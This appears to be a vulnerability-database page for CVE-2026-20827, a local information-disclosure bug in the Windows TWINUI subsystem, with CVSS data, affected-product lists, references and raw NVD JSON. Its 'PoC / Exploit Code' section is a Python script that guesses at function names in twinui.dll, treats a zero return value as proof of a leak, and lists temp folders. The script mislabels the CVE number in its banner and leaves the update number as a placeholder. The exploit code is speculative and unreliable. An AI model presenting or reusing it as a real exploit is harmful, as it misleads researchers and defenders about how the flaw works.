CVE-2026-20827

Description

Exposure of sensitive information to an unauthorized actor in Tablet Windows User Interface (TWINUI) Subsystem allows an authorized attacker to disclose information locally.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:* - VULNERABLE

cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:* - VULNERABLE

cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE

cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:* - VULNERABLE

cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:* - VULNERABLE

Windows 10 Version 1809 for 32-bit Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1903 for 32-bit Systems

Windows 10 Version 1903 for x64-based Systems

Windows 10 Version 1903 for ARM64-based Systems

Windows 10 Version 1909 for 32-bit Systems

Windows 10 Version 1909 for x64-based Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows 10 Version 2004 for 32-bit Systems

Windows 10 Version 2004 for x64-based Systems

Windows 10 Version 2004 for ARM64-based Systems

Windows 10 Version 20H2 for 32-bit Systems

Windows 10 Version 20H2 for x64-based Systems

Windows 10 Version 20H2 for ARM64-based Systems

Windows 10 Version 21H1 for 32-bit Systems

Windows 10 Version 21H1 for x64-based Systems

Windows 10 Version 21H1 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 11 Version 21H2 for x64-based Systems

Windows 11 Version 21H2 for ARM64-based Systems

Windows 11 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for ARM64-based Systems

Windows Server 2019

Windows Server 2022

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-20827 PoC - TWINUI Information Disclosure
# This PoC demonstrates the information disclosure vulnerability in Windows TWINUI subsystem
# Note: This is a conceptual PoC for educational purposes only

import ctypes
import os
import sys
from ctypes import wintypes

# Define necessary Windows API structures
class TWINUI_INFO(ctypes.Structure):
    _fields_ = [
        ("size", wintypes.DWORD),
        ("data_ptr", ctypes.c_void_p),
        ("data_size", wintypes.DWORD)
    ]

def trigger_twinui_leak():
    """
    Trigger the TWINUI information disclosure vulnerability
    This PoC attempts to access the vulnerable TWINUI interface
    """
    print("[*] CVE-2026-20827 PoC - TWINUI Information Disclosure")
    print("[*] Target: Windows TWINUI Subsystem")
    
    # Load TWINUI DLL
    try:
        twinui_dll = ctypes.windll.LoadLibrary("twinui.dll")
        print("[+] TWINUI.dll loaded successfully")
    except Exception as e:
        print(f"[-] Failed to load TWINUI.dll: {e}")
        return False
    
    # Attempt to call vulnerable TWINUI function
    # The actual function varies by Windows version
    vulnerable_functions = [
        "TWINUI_GetUserInfo",
        "TWINUI_QueryInterface",
        "TWINUI_GetPropertyStore"
    ]
    
    for func_name in vulnerable_functions:
        try:
            func = getattr(twinui_dll, func_name)
            print(f"[*] Found function: {func_name}")
            
            # Prepare buffer for information disclosure
            info_buffer = TWINUI_INFO()
            info_buffer.size = ctypes.sizeof(TWINUI_INFO)
            
            # Call the potentially vulnerable function
            result = func(ctypes.byref(info_buffer))
            
            if result == 0:  # Success - indicates information was leaked
                print(f"[!] Potential information disclosure via {func_name}")
                print(f"    Data pointer: {hex(info_buffer.data_ptr)}")
                print(f"    Data size: {info_buffer.data_size}")
                return True
        except Exception as e:
            continue
    
    print("[*] Manual verification may be required")
    print("[*] Check TWINUI temporary files in: %LOCALAPPDATA%\\Temp")
    return False

def check_temp_files():
    """
    Check for potentially leaked information in TWINUI temp files
    """
    temp_paths = [
        os.path.join(os.environ.get('LOCALAPPDATA', ''), 'Temp'),
        os.path.join(os.environ.get('APPDATA', ''), 'Microsoft', 'Windows', 'INetCache'),
        "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\TWINUI"
    ]
    
    print("\n[*] Checking for TWINUI temporary files...")
    for path in temp_paths:
        if os.path.exists(path):
            try:
                files = os.listdir(path)
                twinui_files = [f for f in files if 'twin' in f.lower() or 'ui' in f.lower()]
                if twinui_files:
                    print(f"[+] Found potential files in {path}:")
                    for f in twinui_files[:5]:
                        print(f"    - {f}")
            except PermissionError:
                print(f"[-] Access denied to {path}")

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2026-20227 - Windows TWINUI Information Disclosure")
    print("=" * 60)
    trigger_twinui_leak()
    check_temp_files()
    print("\n[*] Mitigation: Apply Microsoft Security Update KBXXXXXX")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-20827
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-20827
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-20827/
[4] VulDB https://vuldb.com/cve/CVE-2026-20827
[5] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20827

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-20827", "sourceIdentifier": "[email protected]", "published": "2026-01-13T18:16:10.317", "lastModified": "2026-01-15T13:15:07.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of sensitive information to an unauthorized actor in Tablet Windows User Interface (TWINUI) Subsystem allows an authorized attacker to disclose information locally."}, {"lang": "es", "value": "Exposición de información sensible a un actor no autorizado en el subsistema de interfaz de usuario de Tablet Windows (TWINUI) permite a un atacante autorizado divulgar información localmente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.14393.8783", "matchCriteriaId": "9A956D23-259E-450B-8406-FEB2BBED1F39"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.14393.8783", "matchCriteriaId": "41D387B9-5E9D-47CB-B044-D7D10FFFB458"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "DD4CBDAB-7626-4048-8474-B1BD9C1F3255"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "A6D4C631-2CC0-407C-9ACA-7C151006598C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19044.6809", "matchCriteriaId": "1895E186-5B2E-43CC-AF1F-B5C95419D8C5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19045.6809", "matchCriteriaId": "B7CB5184-1BA1-4D71-8AE3-CF4C6B63A469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22631.6491", "matchCriteriaId": "8D675DAA-4DCE-4727-BE5F-C954BBD252C4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.7623", "matchCriteriaId": "D249551B-1433-4E5E-A587-40F782E91E09"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.7623", "matchCriteriaId": "22082D4E-E68F-4E48-98FB-42DFDEE2E2A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.14393.8783", "matchCriteriaId": "A059E609-F8D4-4246-BDAE-0AEDED1744D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "A74970A1-CC81-4482-B465-8382B1544EF3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4648", "matchCriteriaId": "C4AA6991-DE34-48F6-AFD3-77CEE7FBB692"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.2092", "matchCriteriaId": "BA5947E0-C44C-4517-A307-DA79752F30A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.32230", "matchCriteriaId": "D44880ED-E8E9-49A8-BD56-503C63D40000"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20827", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}